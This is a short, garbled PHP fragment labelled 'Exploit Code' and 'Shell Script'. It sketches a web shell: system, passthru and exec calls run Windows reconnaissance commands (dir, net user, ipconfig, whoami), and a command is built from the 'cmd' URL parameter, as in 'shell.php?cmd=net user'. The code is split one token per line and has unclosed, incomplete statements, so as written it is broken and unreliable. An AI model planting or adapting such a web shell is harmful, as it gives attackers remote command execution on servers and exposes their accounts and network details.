<?php
//Exploit Code
system(
'\dir'
);
'\net user'
print
passthru
(
'\ipconfig'
exec
'\whoami'
,
$a
print_r(
//Shell Script
//shell.php?cmd=net user
$cmd
=
'\\'
.
$_GET
[
'cmd'
];
?>